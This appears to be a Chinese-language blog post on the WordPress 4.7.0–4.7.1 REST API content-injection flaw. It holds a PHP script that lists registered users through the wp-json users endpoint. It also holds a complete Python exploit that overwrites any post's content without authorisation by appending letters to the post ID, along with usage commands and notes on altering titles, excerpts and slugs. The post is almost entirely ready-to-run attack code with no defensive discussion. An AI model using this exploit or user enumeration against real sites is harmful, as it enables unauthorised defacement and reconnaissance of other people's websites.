wordpress4.7.0-4.7.1内容注入

一、获取注册的用户名

exp:http://127.0.0.1/wordpress-4.7.1/wp-json/wp/v2/users/

或者用php代码。需要修改$url

<?php
header ('Content-type: text/html; charset=UTF-8');
$url= "http://xxxx.cn/";
$payload="wp-json/wp/v2/users/";
$urli = file_get_contents($url.$payload);
$json = json_decode($urli, true);
if($json){
    echo "*-----------------------------*\n";
foreach($json as $users){
    echo "[*] ID :  |" .$users['id']     ."|\n";
    echo "[*] Name: |" .$users['name']   ."|\n";
    echo "[*] User :|" .$users['slug']   ."|\n";
    echo "\n";
}echo "*-----------------------------*";}
else{echo "[*] No user";}
?>

二、未授权更改任意文章内容

exploit:

1、获取所有文章id

http://192.168.150.149//index.php/wp-json/wp/v2/posts

2、利用exp

import time
import json
import sys
import urllib2
reload(sys)
sys.setdefaultencoding( "utf-8" )

#time.sleep(10)
from lxml import etree

def get_api_url(wordpress_url):
    response = urllib2.urlopen(wordpress_url)
    data = etree.HTML(response.read())
    u = data.xpath('//link[@rel="https://api.w.org/"]/@href')[0]
    # check if we have permalinks
    if 'rest_route' in u:
        print(' ! Warning, looks like permalinks are not enabled. This might not work!')
    return u
def get_posts(api_base):
    respone = urllib2.urlopen(api_base + 'wp/v2/posts')
    posts = json.loads(respone.read())
    for post in posts:
        print(' - Post ID: {}, Title: {}, Url: {}'
              .format(post['id'], post['title']['rendered'], post['link']))
def update_post(api_base, post_id, post_content):
    # more than just the content field can be updated. see the api docs here:
    # https://developer.wordpress.org/rest-api/reference/posts/#update-a-post
    data = json.dumps({
        'content': post_content
    })

    url = api_base + 'wp/v2/posts/{post_id}/?id={post_id}abc'.format(post_id=post_id)
    req = urllib2.Request(url, data, {'Content-Type': 'application/json'})
    response = urllib2.urlopen(req).read()

    print('* Post updated. Check it out at {}'.format(json.loads(response)['link']))

def print_usage():
    print('Usage: {} <url> (optional: <post_id> <file with post_content>)'.format(__file__))

if __name__ == '__main__':
    # ensure we have at least a url
    if len(sys.argv) < 2:
        print_usage()
        sys.exit(1)
    # if we have a post id, we need content too
    if 2 < len(sys.argv) < 4:
        print('Please provide a file with post content with a post id')
        print_usage()
        sys.exit(1)
    print('* Discovering API Endpoint')
    api_url = get_api_url(sys.argv[1])
    print('* API lives at: {}'.format(api_url))

    # if we only have a url, show the posts we have have
    if len(sys.argv) < 3:
        print('* Getting available posts')
        get_posts(api_url)
        sys.exit(0)
    # if we get here, we have what we need to update a post!
    print('* Updating post {}'.format(sys.argv[2]))
    with open(sys.argv[3], 'r') as content:
        new_content = content.readlines()
    update_post(api_url, sys.argv[2], ''.join(new_content))
print('* Update complete!')

 

3、利用方法

把exp保存未wp.py,然后在同目录下新建content文件,(content文件为要修改文章的内容)

需要安装python-lxml

linux : apt-get install python-lxml或者yum install python-lxml

执行:python wp.py http://192.168.1.1/ 文章id content

4、扩展

如何修改文章标题,文章别名,摘要等。

data参数应该是一个包含以下键值对的对象。

title – 文章标题 (string) required

content_raw – 文章内容 (string) required

excerpt_raw – 文章摘要 (string) optional

name – 文章别名 (string) optional

 

发表评论

电子邮件地址不会被公开。 必填项已用*标注